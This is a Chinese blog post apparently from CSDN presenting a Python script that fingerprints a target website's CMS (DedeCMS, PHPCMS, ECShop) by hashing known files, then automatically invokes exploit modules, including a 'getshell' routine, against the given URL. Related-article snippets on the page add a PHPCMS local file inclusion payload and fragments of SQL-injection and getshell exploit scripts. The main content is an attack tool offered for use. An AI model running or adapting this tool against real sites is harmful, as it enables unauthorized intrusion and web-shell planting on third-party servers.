python学习之exp整合

最新推荐文章于 2023-09-05 14:51:58 发布
最新推荐文章于 2023-09-05 14:51:58 发布
阅读量960 收藏 4
点赞数
分类专栏: python学习 文章标签: exp编写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/91363296
版权

python学习之exp整合

将上述的三个exp利用脚本整合为一个,简单的cms漏洞识别利用功能

使用方法

python demo.py "url"

# -*- coding:utf-8 -*-

import urllib
import urllib.request
import requests
import os
import hashlib
#import test.py
import dede
import sys
import time
import phpcms
import ecshop


num=1
count = len(open("cms.txt", 'r').readlines())
key=0
url=sys.argv[1]
tiao=""
zong="|"*100
filename="dede.gif"
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
                        (KHTML, like Gecko) Chrome/51.0.    2704.103 Safari/537.36"}

print("○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ■ ○ ○ ○ ○ ○ ")
print("○ ■ ○ ○ ○ ○ ○ ○ ○ ■ ○ ○ ○ ■ ○ ○ ○ ■ ○ ○ ○ ○ ○ ○ ○ ○ ■ ○ ■ ○ ○ ○ ")
print("○ ○ ■ ○ ○ ■ ■ ■ ■ ■ ■ ○ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ○ ○ ○ ○ ■ ○ ○ ■ ○ ○ ")
print("○ ○ ■ ○ ○ ■ ○ ○ ○ ■ ○ ■ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ○ ○ ○ ○ ■ ○ ○ ○ ○ ○ ")
print("■ ○ ○ ○ ○ ■ ○ ■ ○ ■ ○ ■ ○ ■ ○ ○ ○ ○ ○ ○ ■ ■ ■ ■ ■ ■ ■ ■ ■ ■ ■ ○ ")
print("○ ■ ■ ○ ○ ■ ○ ■ ○ ■ ○ ■ ○ ■ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ■ ○ ○ ○ ○ ○ ")
print("○ ○ ■ ○ ○ ■ ○ ■ ○ ■ ○ ■ ○ ■ ○ ○ ■ ■ ■ ○ ○ ○ ○ ○ ○ ○ ■ ○ ○ ○ ○ ○ ")
print("○ ○ ○ ○ ■ ■ ○ ■ ○ ■ ○ ■ ○ ■ ○ ○ ○ ○ ■ ○ ○ ■ ■ ■ ■ ■ ■ ○ ○ ○ ○ ○ ")
print("○ ○ ○ ■ ○ ■ ○ ■ ○ ■ ○ ■ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ○ ■ ○ ○ ■ ○ ○ ○ ○ ○ ")
print("○ ○ ■ ○ ○ ■ ○ ■ ○ ■ ○ ■ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ■ ○ ○ ○ ○ ")
print("■ ■ ■ ○ ○ ■ ○ ■ ○ ■ ○ ■ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ■ ○ ○ ○ ○ ")
print("○ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ○ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ■ ○ ○ ○ ○ ")
print("○ ○ ■ ○ ○ ○ ■ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ○ ■ ○ ■ ○ ○ ■ ■ ■ ○ ■ ○ ○ ■ ○ ")
print("○ ○ ■ ○ ○ ■ ○ ○ ○ ■ ○ ○ ○ ■ ○ ○ ○ ○ ■ ■ ○ ■ ■ ■ ○ ○ ○ ■ ○ ○ ■ ○ ")
print("○ ○ ■ ○ ■ ○ ○ ○ ○ ■ ○ ■ ○ ■ ○ ○ ○ ○ ■ ○ ○ ○ ■ ○ ○ ○ ○ ○ ■ ○ ■ ○ ")
print("○ ○ ■ ○ ○ ○ ○ ○ ○ ○ ○ ○ ■ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ○ ■ ○ ○ ")
print("\n")



time.sleep(3)


with open("cms.txt","r+") as file:
    line = file.readline()
    while line:
        #print (line)
        url = sys.argv[1]
        url_demo=url
        url=url+line.rstrip('\n')
        #print(url)

        try:
            res = requests.get(url, headers)
        except:
            print("error,请检测网络或者url地址:"+url_demo)
            key=1
            break
            # return False
        else:
            with open(filename, 'wb+') as f:
                f.write(res.content)
                time.sleep(5)
        fd = open(filename, "rb")
        fcont = fd.read()
        fmd5 = hashlib.md5(fcont)
        md5 = fmd5.hexdigest()
        if(tiao==""):
            print("开始进行cms识别")
        time.sleep(5)
        bi=int(num/count*100)
        tiao = "|" * bi
        print("已完成:"+str(bi)+"%")

        print(tiao)
        print(zong)
        if (md5 == "d89937f25006dd437270fc70235c921e"):
            if(tiao!=zong):
                print("已完成:100%")
                print(zong)
                print(zong)
            print("识别成功此为织梦cms")
            time.sleep(3)
            print("开始识别漏洞文件是否存在")
            time.sleep(5)
            dede.dada(url_demo)
            key=1
            break


        if (md5 == "d10e37711ed5eb215b9e04bfb8c0be17"):

            if (tiao != zong):
                print("已完成:100%")
                print(zong)
                print(zong)
            print("识别成功此为phpcms")
            time.sleep(3)
            print("开始识别漏洞文件是否存在")
            time.sleep(5)
            phpcms.getshell(url_demo)
            key = 1
            break

        if (md5 == "e1e94418974ab1d57062bff194c7e334"):
            if (tiao != zong):
                print("已完成:100%")
                print(zong)
                print(zong)
            print("识别成功此为ecshop")
            time.sleep(3)
            print("开始识别漏洞文件是否存在")
            time.sleep(5)
            ecshop.ecshop(url_demo)
            key = 1
            break
        #print(url)
        num=num+1
        line = file.readline()

if(key!=1):
    print("识别完成,该cms不可识别")

另需一个url识别的txt

在这里插入图片描述

最后的演示

在这里插入图片描述

cxk331
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpcms 漏洞姿势
2ed
06-26 2万+
一 .PHPCMS V9本地文件包含漏洞 漏洞出现在如下文件:phpcms/modules/search/index.php 代码如下: 本处大家会发现在使用file_get_contents函数时没有过滤get方式得到的m参数 因此可以构造payload如下 www.xxx.com/m=search&a=public_get_suggest_keyword&q=../../ph...
python学习之wxpython
xf199277的博客
12-16 875
wxpython学习笔记
python学习phpcms exp编写
cxk
05-28 461
python学习phpcms exp编写 针对phpcms v9.6 前台注册getshell exp编写,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import re import string import requests import random import time def getshell(host): try: ...
python编写poc_基于Python编写 Poc/Exp 该怎么入门
weixin_29432863的博客
12-23 616
匿名用户1级2016-05-29 回答其实吧,无论乌云的Tangscan也好,知道创宇的Pocsuite也好,还有Beebeeto也好(Bugscan没写过,不是特别了解不过应该差不多),关于Web的Poc和Exp,都极度依赖于两个Python库。1. Requests : 模拟Web的请求和响应等交互动作。2. Re : 正则表达式,用来验证返回的结果是否符合漏洞的预期,从而验证漏洞是否存在。...
PHPCMS V9.6.0 SQL注入漏洞EXP
weixin_30664615的博客
05-10 838
运行于python3.5 import requests import time import re import sys def banner(): msg = '''--------------EXP IS PHPCMS V9.6.0---------------''' print(msg) def get_encrypt_value(payload,url): ...
061 python实现EXP
鸡蛋炒鸡蛋
04-20 4925
文章目录一:概述二:环境准备三:requests库3.1:发送get请求3.2:相关方法3.3:相关操作3.3.1:定制头部3.3.2:超时3.3.3:GET传参 一:概述 python编写EXP,以web漏洞为主 exp 漏洞利用工具 1、能够看懂别人写的exp,并修改 2、能自己写exp 基础环境python3 核心模块requests 模块说明 requests是使用Apache2 license 许可证的http库 用python编写,比urllib2模块更简洁 requests支持http
python之队列学习
qq_40576653的博客
12-09 301
python之collection.deque()学习 1. 为什么使用deque() 列表list虽然访问速度很快,但是当数据比较多的时候,查找和删除数据的效率就会变的很低,这时候可以使用deque()。 deque()是双端列表,即两端都可以进行插入和删除操作: from collections import deque # 创建一个空的队列 q = deque() # python3也可以这样写 q = collections.deque() 2. 操作deque()的方法 1. append(
EAF:EXP - 管理员查找器
06-30
EAF EXP 管理员查找器可能是一个用Python编写的程序,用于自动化EAF系统的管理和监控任务,包括但不限于查找和验证管理员账户,确保系统的安全性和高效运行。 在深入探讨这个工具之前,我们需要了解几个关键概念: ...
NumPy攻略++Python科学计算与数据分析
12-31
- **内置函数**: 包括数学函数(如`sin`, `cos`, `exp`)、统计函数(如`mean`, `std`, `max`, `min`)和逻辑函数(如`logical_and`, `logical_or`)。 - **通用函数(ufunc)**: NumPy的ufunc是一类对数组元素进行...
My-Penetration-Tools:记录下自己写的一些懒人脚本,涉及信息收集,漏洞Poc&Exp
03-15
3. **自动化漏洞扫描**:整合多个Poc,对多个目标进行批量检测。 这些工具的使用应遵循道德规范,仅限于授权的渗透测试或自家系统的安全评估。非法入侵他人系统将构成违法行为。 总的来说,"My-Penetration-Tools...
Python3中exp()函数用法分析
01-21
描述 exp() 方法返回x的指数,ex。 语法 以下是 exp() 方法的语法: import math math.exp( x ) 注意:exp()是不能直接访问的,需要导入 math 模块,通过静态对象调用该方法。 参数 x — 数值表达式。 返回值 返回x的指数,ex。 实例 以下展示了使用 exp() 方法的实例: #!/usr/bin/python3 import math # 导入 math 模块 print (math.exp(-45.17) : , math.exp(-45.17)) print (math.exp(100.12) : , mat
Machine learning with missing values.pdf
04-22
本教程由INRIA研究员Gael Varoquaux主讲,专门探讨了如何在有缺失值的情况下进行机器学习,重点介绍了Python中的scikit-learn库的使用。 首先,Gael Varoquaux提出了一个常见的问题,即为什么现有的机器学习工具包...
logistic_regression:使用Python和Numpy从头开始进行Logistic回归
02-04
这个项目可能包含了一个Jupyter Notebook,它将以上步骤整合在一起,并展示了如何加载数据、预处理数据、训练模型以及评估模型性能。通过实际操作,你可以更深入地理解Logistic回归的工作流程和内部机制。 总的来说...
pythonexp_python中的exp是什么
weixin_39758696的博客
01-29 3048
Python exp() 函数描述exp() 函数返回 x 的指数,。语法importmathmath.exp(x)注意:exp() 是不能直接访问的,需导入 math 模块,通过静态对象调用该方法。参数x -- 数值表达式。返回值返回 x 的指数,。实例#-*-coding:UTF-8-*-importmath#导入math模块print"math.exp(2):"...
Python exp() 函数
weixin_63660670的博客
09-05 1562
exp()是不能直接访问的,需要导入 math 模块,通过静态对象调用该方法。exp() 方法返回x的指数,ex。返回x的指数,ex。
使用python编写简单的文件上传exp
CC210231的博客
04-02 2090
最近开始学习使用python进行exp编写,毕竟python的功底也不太好,期间遇到了许多问题,下面,就记录一下编写文件上传exp的过程,希望对需要的人有帮助! 首先,我使用的是pikachu靶场的的文件上传的第一个模块来练习 创建一个简单地一句话木马,将文件后缀改为jpg(由于这一关是前端白名单验证,我们能通过抓包修改文件后缀绕过;也可以直接用exp绕过,因为requests的请求不经过前端,也就是不进行客户端验证,直接在请求数据中用php后缀就行;但这里我们要分析数据包,得进行正常的上传流
python编写EXP/POC速成小记
U_U520的博客
02-22 1918
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写出对应的EXP代码,验证漏洞是否存在。不然会出现报错不适用。
Pythonexp()函数的使用
J_____Q的博客
09-27 9380
python处理带有exp规则的算法
大数据技术分享 Spark技术讲座 荷兰铁路的预测性维护 共32页.pdf
最新发布
07-18
大数据技术分享 Spark技术讲座 荷兰铁路的预测性维护 共32页.pdf
Python学习之旅:从入门到精通
"Python之路V2.0.pdf 是一本全面介绍Python编程的书籍,涵盖了从基础到高级的各种主题,旨在帮助读者系统地学习Python,并在60秒内掌握一个小实例。书中包含247个例子,涉及Python的基础、字符串与正则表达式、文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值